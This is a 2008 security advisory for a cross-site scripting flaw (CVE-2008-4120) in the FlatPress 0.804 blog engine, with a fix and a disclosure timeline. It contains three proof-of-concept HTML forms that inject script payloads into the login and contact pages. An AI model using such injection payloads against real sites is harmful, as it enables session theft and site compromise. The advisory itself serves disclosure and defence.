Cross Site Scripting (XSS) Vulnerability in flatpress 0.804, CVE-2008-4120

Cross Site Scripting (XSS) Vulnerabilitiy in flatpress 0.804, CVE-2008-4120

References

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4120
http://www.flatpress.org/

Description

FlatPress is an open-source standard-compliant multi-lingual extensible blogging engine which does not require a DataBase Management System to work.

Example

Assuming flatpress is installed on http://localhost/flatpress/, anybody could inject JavaScript:

<form method="post" action="http://localhost/flatpress/login.php">
<input type="text" name="user" value='"><script>alert(1)</script>'>
<input type=submit></form>

<form method="post" action="http://localhost/flatpress/login.php">
<input type="text" name="pass" value='"><script>alert(1)</script>'>
<input type=submit></form>

<form method="post" action="http://localhost/flatpress/contact.php">
<input type="text" name="name" value='"><script>alert(1)</script>'>
<input type=submit></form>

Workaround/Fix

Update to 0.804.1.

Disclosure Timeline

2008-09-25 Vendor contacted
2008-09-25 Vendor released 0.804.1
2008-09-25 Published advisory

CVE Information

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-4120 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

Credits and copyright

This vulnerability was discovered by Fabian Fingerle (published with help from Hanno Boeck).
It's licensed under the creative commons attribution license.

Fabian Fingerle, 2008-09-25, http://www.fabian-fingerle.de